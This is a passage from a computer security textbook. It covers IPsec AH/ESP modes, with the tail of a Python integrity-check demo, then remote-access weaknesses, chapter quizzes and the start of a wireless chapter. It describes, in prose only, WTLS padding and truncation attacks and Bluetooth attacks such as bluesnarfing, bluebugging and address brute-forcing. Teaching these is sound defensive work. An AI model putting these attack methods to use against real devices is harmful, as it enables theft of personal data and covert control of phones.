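    inner = ipv4_header(host_a, host_b, IPPROTO_TCP, 20 + len(payload)) + payload
    pkt = ah_tunnel(AH_KEY, gw_a, gw_b, seq=1, inner_packet=inner)
    outer_ttl = patch(pkt, 8, bytes([pkt[8] - 1]))     # outer TTL is mutable: still valid
    inner_off = 20 + 12 + ICV_LEN                      # inner header starts after the AH
    inner_ttl = patch(pkt, inner_off + 8, bytes([pkt[inner_off + 8] - 1]))  # covered by ICV
    return verify_ah(AH_KEY, pkt), verify_ah(AH_KEY, outer_ttl), verify_ah(AH_KEY, inner_ttl)

if __name__ == "__main__":
    print("transport mode:", transport_mode_demo())   # (True, True, False)
    print("tunnel mode:   ", tunnel_mode_demo())      # (True, True, False)
```

The third result of each demo is the point of the figures: in transport mode only the original header's immutable fields are covered, in tunnel mode the complete inner packet is.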
Tunneling is a means of encapsulating packets inside a protocol that is understood only at the entry and exit points of the tunnel. This provides security during transport in the tunnel, because outside observers cannot decipher packet contents or even the identities of the communicating parties. IPsec has a tunnel mode that can be used from server to server across a public network. Although the tunnel endpoints are referred to as servers, these devices can be routers, appliances, or servers. In tunnel mode, the tunnel endpoints merely encapsulate the entire packet with new IP headers to indicate the endpoints, and they encrypt the contents of this new packet. The true source and destination information is contained in the inner IP header, which is encrypted in the tunnel. The outer IP header contains the addresses of the endpoints of the tunnel. ESP provides a means of encrypting the packet's contents, as shown in Figure 11.30. In this case, in transport mode, the datagram contents are encrypted and authenticated via the ESP header and footer/trailer that are inserted into the datagram. As mentioned, AH and ESP can be employed in tunnel mode. ESP affords the same encryption protection to the contents of the tunneled packet, which is the entire packet from the initial sender, as illustrated in Figure 11.31. Together, in tunnel mode, AH and ESP can provide complete protection across the packet, as shown in Figure 11.32. The specific combination of AH and ESP is referred to as a security association in IPsec.
• Figure 11.30 IPsec use of ESP in transport mode
• Figure 11.31 IPsec use of ESP in tunnel mode
• Figure 11.32 IPsec ESP and AH packet construction in tunnel mode
In IP version 4 (IPv4), IPsec is an add-on, and its acceptance is vendor driven. It is not a part of the original IP—one of the short-sighted design flaws of the original IP. In IPv6, IPsec is integrated into IP and is native on all packets. Its use is still optional, but its inclusion in the protocol suite will guarantee interoperability across vendor solutions when they are compliant with IPv6 standards. IPsec uses cryptographic keys in its security process and has both manual and automatic distribution of keys as part of the protocol series. Manual key distribution is included, but it is practical only in small, static environments and does not scale to enterprise-level implementations. The default method of key management, Internet Key Exchange (IKE), is automated. IKE authenticates each peer involved in IPsec and negotiates the security policy, including the exchange of session keys. IKE creates a secure tunnel between peers and then negotiates the security association for IPsec across this channel. This is done in two phases: the first develops the channel, and the second develops the security association. Figure 11.33 illustrates the different levels of protection offered by VPNs and IPsec. This shows the advantages of IPsec and its more comprehensive coverage.
• Figure 11.33 Protection from different levels of encryption
Vulnerabilities of Remote Access Methods
The primary vulnerability associated with many of these methods of remote access is the passing of critical data in cleartext. Plaintext passing of passwords provides no security if the password is sniffed, and sniffers are easy to use on a network. Even plaintext passing of user IDs gives away information that can be correlated and possibly used by an attacker. Plaintext credential passing is one of the fundamental flaws with Telnet and is why SSH was developed. This is also one of the flaws with RADIUS and TACACS+, as they have a segment unprotected. There are methods for overcoming these limitations, although they require discipline and understanding in setting up a system. The strength of the encryption algorithm is also a concern. Should a specific algorithm or method prove to be vulnerable, services that rely solely on it are also vulnerable. To get around this dependency, many of the protocols allow numerous encryption methods, so that should one prove vulnerable, a shift to another restores security.
Tech Tip
IPsec in a Nutshell
IPsec has two primary modes, transport mode and tunnel mode. Transport mode is simpler and adds fewer bytes to a packet, but can have issues transiting items such as firewalls. Tunneling mode resolves the firewall issue by total encapsulation. IPsec has two primary mechanisms, AH and ESP. AH provides for authentication of datagram contents, but no protection in the form of secrecy. ESP encrypts the datagram, providing secrecy, and when used with AH, ESP provides authentication as well.
As with any software implementation, there always exists the possibility that a bug could open the system to attack. Bugs have been corrected in most software packages to close holes that made systems vulnerable, and remote access functionality is no exception. This is not a Microsoft-only phenomenon, as one might believe from the popular press. Critical flaws have been found in almost every product, from open system implementations such as OpenSSH to proprietary systems such as Cisco IOS. The important issue is not the presence of software bugs, for as software continues to become more complex, this is an unavoidable issue. The true key is vendor responsiveness to fixing the bugs once they are discovered, and the major players, such as Cisco and Microsoft, have been very responsive in this area.
Connection Summary
There are many protocols used for remote access and authentication and related purposes. These methods have their own assigned ports and these assignments are summarized in Table 11.2.
Chapter 11 Review
For More Information
Microsoft's TechNet Group Policy page http://technet.microsoft.com/en-us/windowsserver/grouppolicy/default.aspx
SANS Consensus Policy Resource Community – Password Policy https://www.sans.org/security-resources/policies/general/pdf/password-protection-policy
Lab Manual Exercises
The following lab exercises from the companion lab manual, Principles of Computer Security Lab Manual, Fourth Edition, provide practical application of material covered in this chapter:
Chapter Summary
After reading this chapter and completing the exercises, you should understand the following about privilege management, authentication, and remote access protocols.
Identify the differences among user, group, and role management
Privilege management is the process of restricting a user's ability to interact with the computer system.
Privilege management can be based on an individual user basis, on membership in a specific group or groups, or on a function/role.
Key concepts in privilege management are the ability to restrict and control access to information and information systems.
One of the methods used to simplify privilege management is single sign-on, which requires a user to authenticate successfully once. The validated credentials and associated rights and privileges are then automatically carried forward when the user accesses other systems or applications.
Implement password and domain password policies
Password policies are sets of rules that help users select, employ, and store strong passwords. Tokens combine "something you have" with "something you know," such as a password or PIN, and can be hardware or software based.
Passwords should have a limited span and should expire on a scheduled basis.
Describe methods of account management (SSO, time of day, logical token, account expiration)
Administrators have many different tools at their disposal to control access to computer resources, including password and account expiration methods.
User authentication methods can include several factors, including tokens.
Users can be limited in the hours during which they can access resources.
Resources such as files, folders, and printers can be controlled through permissions or access control lists.
Permissions can be assigned based on a user's identity or their membership in one or more groups.
Describe methods of access management (MAC, DAC, and RBAC)
Mandatory access control is based on the sensitivity of the information or process itself.
Discretionary access control uses file permissions and ACLs to restrict access based on a user's identity or group membership.
Role-based access control restricts access based on the user's assigned role or roles.
Rule-based access control restricts access based on a defined set of rules established by the administrator.
Discuss the methods and protocols for remote access to networks
Remote access protocols provide a mechanism to remotely connect clients to networks.
A wide range of remote access protocols has evolved to support various security and authentication mechanisms.
Remote access is granted via remote access servers, such as RRAS or RADIUS.
Identify authentication, authorization, and accounting (AAA) protocols
Authentication is a cornerstone element of security, connecting access to a previously approved user ID.
Authorization is the process of determining whether an authenticated user has permission.
Accounting protocols manage connection time and cost records.
Explain authentication methods and the security implications in their use
Password-based authentication is still the most widely used because of cost and ubiquity.
Ticket-based systems, such as Kerberos, form the basis for most modern authentication and credentialing systems.
Implement virtual private networks (VPNs) and their security aspects
VPNs use protocols to establish a private network over a public network, shielding user communications from outside observation.
VPNs can be invoked via many different protocol mechanisms and involve either a hardware or software client on each end of the communication channel.
Describe Internet Protocol Security (IPsec) and its use in securing communications
IPsec is the native method of securing IP packets; it is optional in IPv4 and mandatory in IPv6.
IPsec uses Authentication Headers (AH) to authenticate packets.
IPsec uses Encapsulating Security Payload (ESP) to provide confidentiality service at the datagram level.
Key Terms
AAA, access control, access control list (ACL), accounting, administrator, attribute-based access control (ABAC), authentication, Authentication Header (AH), authentication server (AS), authorization, content protection, context protection, discretionary access control (DAC), domain controller, domain password policy, Encapsulating Security Payload (ESP), eXtensible Access Control Markup Language (XACML), group, group policy object (GPO), identification, Internet Key Exchange (IKE), Internet Protocol Security (IPsec), Internet Security Association and Key Management Protocol (ISAKMP), Kerberos, key distribution center (KDC), Layer 2 Tunneling Protocol (L2TP), mandatory access control (MAC), Oakley, password policy, permissions, Point-to-Point Tunneling Protocol (PPTP), privilege management, privileges, remote access server (RAS), rights, role, role-based access control (RBAC), root, rule-based access control, Secure Key Exchange Mechanism for Internet (SKEMI), security association (SA), single sign-on (SSO), superuser, ticket-granting server (TGS), token, user, username, virtual private network (VPN)
Key Terms Quiz
Use terms from the Key Terms list to complete the sentences that follow. Don't use the same term more than once. Not all terms will be used.
1. _______________ is an authentication model designed around the concept of using tickets for accessing objects.
2. _______________ is designed around the type of tasks people perform.
3. A formal manner of describing the necessary and sufficient portions of the IPsec protocol series to achieve a specific level of protection is a(n) _______________.
4. _______________ describes a system where every resource has access rules set for it all of the time.
5. _______________ is an authentication process where the user can enter their user ID (or username) and password and then be able to move from application to application or resource to resource without having to supply further authentication information.
6. In IPsec, a security association is defined by a specific combination of _______________ and _______________.
7. The protection of the data portion of a packet is _______________.
8. The protection of the header portion of a packet is _______________.
9. _______________ is a key management and exchange protocol used with IPsec.
10. The process of comparing credentials to those established during the identification process is referred to as _______________.
Multiple-Choice Quiz
1. Authentication is typically based upon what?
A. Something a user possesses
B. Something a user knows
C. Something measured on a user, such as a fingerprint
D. All of the above
2. On a VPN, traffic is encrypted and decrypted at:
A. Endpoints of the tunnel only
B. Users' machines
C. Each device at each hop
D. The data link layer of access devices
3. A ticket-granting server is an important element in which of the following authentication models?
A. L2TP
B. RADIUS
C. PPP
D. Kerberos
4. What protocol is used for RADIUS?
A. UDP
B. NetBIOS
C. TCP
D. Proprietary
5. Under which access control system is each piece of information and every system resource (files, devices, networks, and so on) labeled with its sensitivity level?
A. Discretionary access control
B. Resource access control
C. Mandatory access control
D. Media access control
6. IPsec provides which options as security services?
A. ESP and AH
B. ESP and AP
C. EA and AP
D. EA and AH
7. Secure Shell uses which port to communicate?
A. TCP port 80
B. UDP port 22
C. TCP port 22
D. TCP port 110
8. Elements of Kerberos include which of the following?
A. Tickets, ticket-granting server, ticket-authorizing agent
B. Ticket-granting ticket, authentication server, ticket
C. Services server, Kerberos realm, ticket authenticators
D. Client-to-server ticket, authentication server ticket, ticket
9. To establish a PPTP connection across a firewall, you must do which of the following?
A. Do nothing; PPTP does not need to cross firewalls by design.
B. Do nothing; PPTP traffic is invisible and tunnels past firewalls.
C. Open a UDP port of choice and assign it to PPTP.
D. Open TCP port 1723.
10. To establish an L2TP connection across a firewall, you must do which of the following?
A. Do nothing; L2TP does not cross firewalls by design.
B. Do nothing; L2TP tunnels past firewalls.
C. Open a UDP port of choice and assign it to L2TP.
D. Open UDP port 1701.
Essay Quiz
1. A co-worker with a strong Windows background is having difficulty understanding UNIX file permissions. Describe UNIX file permissions for him. Compare UNIX file permissions to Windows file permissions.
2. How are authentication and authorization alike, and how are they different? What is the relationship, if any, between the two?
3. What is a VPN, and what technologies are used to create one?
Lab Projects
• Lab Project 11.1
Using two workstations and some routers, set up a simple VPN. Using Wireshark (a shareware network protocol analyzer, available at http://wireshark.com), observe traffic inside and outside the tunnel to demonstrate protection.
• Lab Project 11.2
Using freeSSHd and freeFTPd (both shareware programs, available at www.freesshd.com) and Wireshark, demonstrate the security features of SSH compared to Telnet and FTP.
Chapter 12 Wireless Security and Mobile Devices
We must plan for freedom, and not only for security, if for no other reason than that only freedom can make security secure.
—KARL POPPER
In this chapter, you will learn how to
Describe the different wireless systems in use today
Detail WAP and its security implications
Identify 802.11's security issues and possible solutions
Examine the elements needed for enterprise wireless deployment
Examine the security of mobile systems
Wireless is increasingly the way people access the Internet. Because wireless access is considered a consumer benefit, many businesses have added wireless access points to lure customers into their shops. With the rollout of fourth-generation (4G) high-speed cellular networks, people are also increasingly accessing the Internet from their mobile phones. The massive growth in popularity of nontraditional computers such as netbooks, e-readers, and tablets has also driven the popularity of wireless access. As wireless use increases, the security of the wireless protocols has become a more important factor in the security of the entire network. As a security professional, you need to understand wireless network applications because of the risks inherent in broadcasting a network signal where anyone can intercept it. Sending unsecured information across public airwaves is tantamount to posting your company's passwords by the front door of the building. This chapter opens with looks at several current wireless protocols and their security features. The chapter finishes with an examination of mobile systems and their security concerns.
Introduction to Wireless Networking
Wireless networking is the transmission of packetized data by means of a physical topology that does not use direct physical links. This definition can be narrowed to apply to networks that use radio waves to carry the signals over either public or private bands, instead of using standard network cabling. Some proprietary applications like long-distance microwave links use point-to-point technology with narrowband radios and highly directional antennas. However, this technology is not common enough to produce any significant research into its vulnerabilities, and anything that was developed would have limited usefulness. So this chapter focuses on point-to-multipoint systems, the two most common of which are the family of cellular protocols and IEEE 802.11. IEEE 802.11 is a family of protocols instead of a single specification; this is a summary table of the 802.11 family.
The IEEE 802.11 protocol has been standardized by the IEEE for wireless local area networks (LANs). Three versions are currently in production—802.11g, 802.11a, and 802.11n. The latest standard is 802.11ac, but it provides backward compatibility with 802.11g hardware. Cellular phone technology has moved rapidly to embrace data transmission and the Internet. The Wireless Application Protocol (WAP) was one of the pioneers of mobile data applications, but it has been overtaken by a variety of protocols pushing us to fourth-generation (4G) mobile networks.
Tech Tip
Wireless Systems
There are several different wireless bands in common use today, the most common of which is the Wi-Fi series, referring to the 802.11 Wireless LAN standards certified by the Wi-Fi Alliance. Another set of bands is WiMAX, which refers to the set of 802.16 wireless network standards ratified by the WiMAX Forum. Lastly, there is ZigBee, a low-power, personal area networking technology described by the IEEE 802.15.4 series.
Bluetooth is a short-range wireless protocol typically used on small devices such as mobile phones. Early versions of these phones also had Bluetooth on and discoverable as a default, making the compromise of a nearby phone easy. Security research has focused on finding problems with these devices simply because the devices are so common. The security world ignored wireless for a long time, and then within the space of a few months, it seemed like everyone was attempting to breach the security of wireless networks and transmissions. One reason wireless suddenly found itself to be such a target is that wireless networks are so abundant and so unsecured. The dramatic proliferation of these inexpensive products has made the security ramifications of the protocol astonishing. No matter what the system, wireless security is a very important topic as more and more applications are designed to use wireless to send data. Wireless is particularly problematic from a security standpoint, because there is no control over the physical layer of the traffic. In most wired LANs, the administrators have physical control over the network and can control to some degree who can actually connect to the physical medium. This prevents large amounts of unauthorized traffic and makes snooping around and listening to the traffic difficult. Wireless does away with the physical limitations. If an attacker can get close enough to the signal's source as it is being broadcast, he can at the very least listen to the access point and clients talking to capture all the packets for examination, as depicted in Figure 12.1.
• Figure 12.1 Wireless transmission extending beyond the facility's walls
Attackers can also try to modify the traffic being sent or try to send their own traffic to disrupt the system. In this chapter, you will learn about the different types of attacks that wireless networks face.
Mobile Phones
When cellular phones first hit the market, security wasn't an issue—if you wanted to keep your phone safe, you'd simply keep it physically secure and not loan it to people you didn't want making calls. Its only function was that of a telephone.
• Early cell phones just allowed you to make calls.
The advance of digital circuitry has added amazing power in smaller and smaller devices, causing security to be an issue as the software becomes more and more complicated. Today's small and inexpensive products have made the wireless market grow by leaps and bounds, as traditional wireless devices such as cellular phones and pagers have been replaced by tablets and smartphones.
• Today's phones allow you to carry computers in your pocket.
Today's smartphones support multiple wireless data access methods, including 802.11, Bluetooth, and cellular. These mobile phones and tablet devices have caused consumers to demand access to the Internet anytime and anywhere. This has generated a demand for additional data services. The Wireless Application Protocol (WAP) attempted to satisfy the needs for more data on mobile devices, but it is falling by the wayside as the mobile networks' capabilities increase. The need for more and more bandwidth has pushed carriers to adopt a more IP-centric routing methodology with technologies such as High Speed Packet Access (HSPA) and Evolution Data Optimized (EVDO). Mobile phones have ruthlessly advanced with new technologies and services, causing phones and the carrier networks that support them to be described in generations—1G, 2G, 3G, and 4G. 1G refers to the original analog cellular standard, Advanced Mobile Phone System (AMPS). 2G refers to the digital network that superseded it. 3G is the system of mobile networks that followed, with many different implementations carrying data at up to 400 Kbps. 4G represents the current state of mobile phones, with LTE being the primary method. 4G allows carriers to offer a wider array of services to the consumer, including broadband data service up to 14.4 Mbps and video calling. 4G is also a move to an entirely IP-based network for all services, running voice over IP (VoIP) on your mobile phone and speeds up to 1 Gbps. All of these "gee-whiz" features are nice, but how secure are your bits and bytes going to be when they're traveling across a mobile carrier's network? All the protocols mentioned have their own security implementations—WAP applies its own Wireless Transport Layer Security (WTLS) to attempt to secure data transmissions, but WAP still has issues such as the "WAP gap" (as discussed next). 3G networks have attempted to push a large amount of security down the stack and rely on the encryption designed into the wireless protocol.
Tech Tip
Relationship of WAP and WTLS
Wireless Application Protocol is a lightweight protocol designed for mobile devices. Wireless Transport Layer Security is a lightweight security protocol designed for WAP.
Wireless Application Protocol
WAP was introduced to compensate for the relatively low amount of computing power on handheld devices as well as the generally poor network throughput of cellular networks. It uses the Wireless Transport Layer Security (WTLS) encryption scheme, which encrypts the plaintext data and then sends it over the airwaves as ciphertext. The originator and the recipient both have keys to decrypt the data and reproduce the plaintext. This method of ensuring confidentiality is very common, and if the encryption is well designed and implemented, it is difficult for unauthorized users to take captured ciphertext and reproduce the plaintext that created it. As described in Chapter 5, confidentiality is the ability to keep protected data a secret. WTLS uses a modified version of the Transport Layer Security (TLS) protocol, which is the replacement for Secure Sockets Layer (SSL). The WTLS protocol supports several popular bulk encryption algorithms, including Data Encryption Standard (DES), Triple DES (3DES), RC5, and International Data Encryption Algorithm (IDEA).
Cross Check
Symmetric Encryption
In Chapter 5 you learned about symmetric encryption, including DES, 3DES, RC5, and IDEA. In the context of wireless communication, what algorithm would protect your data the best? What are some possible problems with these algorithms?
WTLS implements integrity through the use of message authentication codes (MACs). A MAC algorithm generates a one-way hash of the compressed WTLS data. WTLS supports the MD5 and SHA MAC algorithms. The MAC algorithm is also decided during the WTLS handshake. The TLS protocol that WTLS is based on is designed around Internet-based computers, machines that have relatively high processing power, large amounts of memory, and sufficient bandwidth available for Internet applications. Devices that WTLS must accommodate are limited in all these respects. Thus, WTLS has to be able to cope with small amounts of memory and limited processor capacity, as well as long round-trip times that TLS could not handle well. These requirements are the primary reasons that WTLS has security issues. As the protocol is designed around more capable servers than devices, the WTLS specification can allow connections with little to no security. Clients with low memory or CPU capabilities cannot support encryption, and choosing null or weak encryption greatly reduces confidentiality. Authentication is also optional in the protocol, and omitting authentication reduces security by leaving the connection vulnerable to a man-in-the-middle–type attack. In addition to the general flaws in the protocol's implementation, several known security vulnerabilities exist, including those to the chosen-plaintext attack, the PKCS #1 attack, and the alert message truncation attack. The chosen-plaintext attack works on the principle of a predictable initialization vector (IV). By the nature of the transport medium that it is using, WAP, WTLS needs to support unreliable transport. This forces the IV to be based on data already known to the client, and WTLS uses a linear IV computation. Because the IV is based on the sequence number of the packet, and several packets are sent unencrypted, entropy is severely decreased. This lack of entropy in the encrypted data reduces confidentiality.
Tech Tip
Weakness in WAP Aggregation
WAP is a point-to-multipoint protocol, but it can face disruptions or attacks because it aggregates at well-known points: the cellular antenna towers.
Now consider the PKCS #1 attack. Public Key Cryptography Standards (PKCS), used in conjunction with RSA encryption, provide standards for formatting the padding used to generate a correctly formatted block size. When the client receives the block, it will reply to the sender as to the validity of the block. An attacker takes advantage of this by attempting to send multiple guesses at the padding to force a padding error. In vulnerable implementations, when RSA signatures and encryption are performed per PKCS #1, the RSA messages can be decrypted with approximately 2^20 chosen ciphertext queries. Alert messages in WTLS are sometimes sent in plaintext and are not authenticated. This fact could allow an attacker to overwrite an encrypted packet from the actual sender with a plaintext alert message, leading to possible disruption of the connection through, for instance, a truncation attack. Some concern over the so-called WAP gap involves confidentiality of information where the two different networks meet, the WAP gateway, as shown in Figure 12.2.
• Figure 12.2 The WAP gap shows an unencrypted space between two enciphered connections.
WTLS acts as the security protocol for the WAP network, and TLS is the standard for the Internet, so the WAP gateway has to perform translation from one encryption standard to the other. This translation forces all messages to be seen by the WAP gateway in plaintext. This is a weak point in the network design, but from an attacker's perspective, it's a much more difficult target than the WTLS protocol itself. Threats to the WAP gateway can be minimized through careful infrastructure design, such as selecting a secure physical location and allowing only outbound traffic from the gateway. A risk of compromise still exists, however, and an attacker would find a WAP gateway an especially appealing target, as plaintext messages are processed through it from all wireless devices, not just a single user. The solution for this is to have end-to-end security layered over anything underlying, in effect creating a VPN from the endpoint to the mobile device, or to standardize on a full implementation of TLS for end-to-end encryption and strong authentication. The limited nature of the devices hampers the ability of the security protocols to operate as intended, compromising any real security to be implemented on WAP networks.
3G Mobile Networks
Our cell phones are one of the most visible indicators of advancing technology. Within recent memory, we were forced to switch from old analog phones to digital models. The networks have been upgraded to 3G, greatly enhancing speed and lowering latency. This has reduced the need for lightweight protocols to handle data transmission, and more standard protocols such as IP can be used. The increased power and memory of the handheld devices also reduce the need for lighter-weight encryption protocols. As a result, the 3G protocols build their own encryption into the radio link, and security relies either on these lower-level protocols or on the standard application-level security protocols used in normal IP traffic. Several competing data transmission standards exist for 3G networks, such as HSPA and EVDO. However, all the standards include link-layer encryption on the air interface to protect both the voice traffic and the data sent by the device as they travel across the wireless signal. The cryptographic standard adopted for 3G is known as KASUMI (used as the UEA1/UIA1 algorithms in UMTS and as A5/3 in GSM). This modified version of the MISTY1 block cipher uses 64-bit blocks and 128-bit keys. Multiple attacks have been published against this cipher. While the attacks tend to be impractical, and the air-interface encryption in any case ends at the carrier's base station rather than at the far end of the connection, this shows that application-layer security is still needed for secure transmission of data on mobile devices. WAP and WTLS can be used over the lower-level protocols, but traditional TLS can also be used.
3G, 4G, LTE… What's the Difference?
In today's mobile marketing campaigns, we hear of 3G, 4G, and LTE. What do these terms mean? 3G is the "old" network today, but it is still very capable for a variety of purposes. 4G phones are supposed to be even faster, but that's not always the case. A lot depends on what you use the phone for. There are several technologies called "4G," each with multiple implementations. This makes the term almost meaningless from a technical point of view. The International Telecommunication Union (ITU), a standards body, issued requirements that a network needed to meet to be called "4G," but those requirements were ignored by carriers. Now the move is to LTE, which stands for Long Term Evolution of the Universal Mobile Telecommunications System (UMTS). UMTS is the group of standards that defines 3G for GSM networks across the world, and now LTE. There are numerous technical implementations of LTE, but one of the key elements is the use of two different types of air interfaces (radio links), one for downlink (from tower to device) and one for uplink (from device to tower). This is one of the reasons LTE is much faster when uploading information from the phone to the Internet. LTE offers high speed (up to 30 Mbps) and low latency. But not all LTE is equal. Recent tests indicate as much as an order of magnitude difference in speeds between carriers. As LTE expands, newer versions, each with its own set of characteristics picked from the overall "standard," are deployed by carriers. While the LTE-A standard has been approved, no carriers currently meet the entire standard. Each carrier has picked the elements of the standard they feel meet their needs. Bottom line: 4G has become a marketing term, and the only guide one has is to use actual survey results in the area of your service to determine the best solution for your use requirements.
4G Mobile Networks
Just as the mobile network carriers were finishing the rollout of 3G services, 4G networks appeared on the horizon. The desire for anywhere, anytime Internet connectivity at speeds near that of a wired connection drives deployment of these next-generation services. 4G can support high-quality VoIP connections, video calls, and real-time video streaming. Just as 3G had some intermediaries that were considered 2.9G, LTE and WiMAX networks are sometimes referred to as 3.5G, 3.75G, or 3.9G. The carriers are marketing these new networks as 4G, although they do not adhere to the ITU standards for 4G speeds. True 4G would require a firm to meet all of the technical standards issued by the ITU, including specifications that apply to the tower side of the system. Some of the 4G requirements are
Be based on an all-IP packet-switched network
Offer high quality of service for next-generation multimedia support
Smooth handovers across heterogeneous networks
Peak data rates of up to approximately 100 Mbps for high mobility (mobile access)
Peak data rates of up to approximately 1 Gbps for low mobility such as nomadic/local wireless access
Dynamically share and use the network resources to support more simultaneous users per cell
Use scalable channel bandwidths of 5–20 MHz, optionally up to 40 MHz
Peak link spectral efficiency of 15 bps/Hz in the downlink, and 6.75 bps/Hz in the uplink
To achieve these and other technical elements requires specific tower-side equipment as well as handset specifications. Different carriers have chosen different sets of these to include in their offerings, each building upon their existing networks and existing technologies. Most 4G deployments are continuations of technologies already deployed, just newer evolutions of standards. This is how LTE, LTE Advanced, WiMAX, and WiMAX 2 were born. The LTE and WiMAX series come from separate roots, and are not interchangeable. Within the families, interoperability is possible and is dependent upon carrier implementation.
Bluetooth
Bluetooth was originally developed by Ericsson and known as multi-communicator link; in 1998, Nokia, IBM, Intel, and Toshiba joined Ericsson and adopted the Bluetooth name. This consortium became known as the Bluetooth Special Interest Group (SIG). The SIG now has more than 24,000 members and drives the development of the technology and controls the specification to ensure interoperability.
• Bluetooth icon
Most people are familiar with Bluetooth as it is part of many mobile phones and headsets, such as those shown in Figure 12.3. This short-range, low-power wireless protocol transmits in the 2.4 GHz band, the same band used for 802.11. The concept for the short-range (approx. 32 feet) wireless protocol is to transmit data in personal area networks (PANs).
• Figure 12.3 Headsets and cell phones are two of the most popular types of Bluetooth-capable devices.
Bluetooth transmits and receives data from a variety of devices, the most common being mobile phones, laptops, printers, and audio devices. The mobile phone has driven a lot of Bluetooth growth and has even spread Bluetooth into new cars as a mobile phone hands-free kit. Bluetooth has gone through a few releases. Version 1.1 was the first commercially successful version, with version 1.2 released in 2003 and correcting some of the problems found in 1.1. Version 1.2 allows speeds up to 721 Kbps and improves resistance to interference. Version 1.2 is backward-compatible with version 1.1. With the rate of advancement and the life of most tech items, the Bluetooth 1 series is basically extinct. Bluetooth 2.0 introduced enhanced data rate (EDR), which allows the transmission of up to 3.0 Mbps. Bluetooth 3.0 has the capability to use an 802.11 channel to achieve speeds up to 24 Mbps. The current version is the Bluetooth 4.0 standard with support for three modes: classic, high speed, and low energy. Bluetooth 4 introduces a new method to support collecting data from devices that generate data at a very low rate. Some devices, such as medical devices, may only collect and transmit data at low rates. This feature, called Low Energy (LE), was designed to aggregate data from various sensors, like heart rate monitors, thermometers, and so forth, and carries the commercial name Bluetooth Smart.
Tech Tip
Bluetooth Security
Bluetooth should always have discoverable mode turned off unless you're deliberately pairing a device.
As Bluetooth became popular, people started trying to find holes in it. Bluetooth features easy configuration of devices to allow communication, with no need for network addresses or ports. Bluetooth uses pairing to establish a trust relationship between devices. To establish that trust, the devices advertise capabilities and require a passkey. To help maintain security, most devices require the passkey to be entered into both devices; this prevents a default-passkey type of attack. The Bluetooth protocol's advertisement of services and pairing properties is where some of the security issues start.
Tech Tip
Bluetooth Data Rates
Different versions of Bluetooth have differing maximum data transfer rates.
Bluetooth Attacks
As a wireless method of communication, Bluetooth is open to connection and attack from outside the intended sender and receiver. Several different attack modes have been discovered that can be used against Bluetooth systems.
Bluejacking is a term used for the sending of unauthorized messages to another Bluetooth device. This involves placing the message in the name field of a phonebook contact and then sending that contact to the possible recipient via Bluetooth. Originally, this involved sending text messages, but more recent phones can send images or audio as well. A popular variant of this is the transmission of "shock" images, featuring disturbing or crude photos. As Bluetooth is a short-range protocol, the attacker and victim must be within roughly 10 yards of each other. The victim's phone must also have Bluetooth enabled and must be in discoverable mode. On some early phones, this was the default configuration, and while it makes connecting external devices easier, it also allows attacks against the phone. If Bluetooth is turned off, or if the device is set to nondiscoverable, bluejacking can be avoided.
Bluesnarfing is similar to bluejacking in that it uses the same contact transmission protocol. The difference is that instead of sending an unsolicited message to the victim's phone, the attacker copies off the victim's information, which can include e-mails, contact lists, calendar, and anything else that exists on that device. More recent phones with media capabilities can be snarfed for private photos and videos. Bluesnarfing used to require a laptop with a Bluetooth adapter, making it relatively easy to identify a possible attacker, but bluesnarfing applications are now available for mobile devices. Bloover, a combination of Bluetooth and Hoover, is one such application that runs as a Java application on a phone. The majority of Bluetooth phones need to be discoverable for the bluesnarf attack to work, but the phone does not necessarily need to be paired. In theory, an attacker can also brute-force the device's unique 48-bit device address (BD_ADDR). A program called RedFang attempts to perform this brute-force attack by trying all possible addresses and seeing which ones respond; in practice the search is smaller than 2^48 because the upper 24 bits of the address are a manufacturer prefix, so an attacker who guesses the vendor needs to try only the lower 24 bits. This approach was addressed in Bluetooth 1.2 with an anonymity mode.
Bluebugging is a far more serious attack than either bluejacking or bluesnarfing. In bluebugging, the attacker uses Bluetooth to establish a serial connection to the device. This allows access to the full AT command set (GSM phones use AT commands similar to Hayes-compatible modems). This connection allows full control over the phone, including the placing of calls to any number without the phone owner's knowledge. Fortunately, this attack requires pairing of the devices to complete, and phones initially vulnerable to the attack have updated firmware to correct the problem. To accomplish the attack now, the phone owner would need to surrender her phone and allow an attacker to physically establish the connection.
Bluetooth DoS is the use of Bluetooth technology to perform a denial-of-service attack against another device. In this attack, an attacker repeatedly requests pairing with the victim device. This type of attack does not divulge information or permit access, but is a nuisance. And, more importantly, if done repeatedly it can drain a device's battery, or prevent other operations from occurring on the victim's device. As with all Bluetooth attacks, because of the short range involved, all one has to do is leave the area and the attack would cease.
Bluetooth technology is likely to grow due to the popularity of mobile phones. Software and protocol updates have helped to improve the security of the protocol. Almost all phones now keep Bluetooth turned off by default, and they allow you to make the phone discoverable for only a limited amount of time. User education about security risks is also a large factor in avoiding security breaches.
Near Field Communication
Near field communication (NFC) is a set of wireless technologies that enables smartphones and other devices to establish radio communication over a short proximity, typically a distance of 10 cm (3.9 in) or less. This technology did not see much use until recently, when it started being employed to move data between cell phones and in mobile payment systems. NFC is likely to become a high-use technology in the years to come, as multiple uses exist for the technology, and the next generation of smartphones is likely to see this as a standard function.
IEEE 802.11 Series
The 802.11b protocol is an IEEE standard ratified in 1999. The standard launched a range of products (such as wireless routers, an example of which is shown in Figure 12.4) that would open the way to a whole new genre of possibilities for attackers and a new series of headaches for security administrators everywhere. 802.11 was a new standard for sending packetized data traffic over radio waves in the unlicensed 2.4 GHz band.
• Figure 12.4 A common wireless router
This group of IEEE standards is also called Wi-Fi, which is a certification owned by an industry group, the Wi-Fi Alliance. A device marked as Wi-Fi Certified adheres to the standards of the alliance. As the products matured and became easy to use and affordable, security experts began to deconstruct the limited security that had been built into the standard.
The 802.11b standard was the first to market, 802.11a followed, and 802.11g products became the most common ones sold. These chipsets have also commonly been combined into devices that support the a/b/g standards. 802.11n followed, and 802.11ac is the latest standard. This table shows the standards with their frequency bands.

Standard    Frequency band
802.11a     5 GHz
802.11b     2.4 GHz
802.11g     2.4 GHz
802.11n     2.4 GHz and 5 GHz
802.11ac    5 GHz

802.11a is the wireless networking standard that supports traffic on the 5 GHz band, allowing faster speeds over shorter ranges. Features of 802.11b and 802.11a were later joined to create 802.11g, an updated standard that allows the faster speeds of the 5 GHz specification on the 2.4 GHz band. Security problems were discovered in the implementations of these early wireless standards, principally involving the Wired Equivalent Privacy (WEP) protocol. These problems included an attacker's ability to break the cryptography and monitor other users' traffic. The security problems in WEP were a top concern until the adoption of 802.11i-compliant products enhanced the security with Wi-Fi Protected Access (WPA), discussed later in the chapter. 802.11ac is the latest standard; it focuses on achieving much higher speeds for wireless networks.
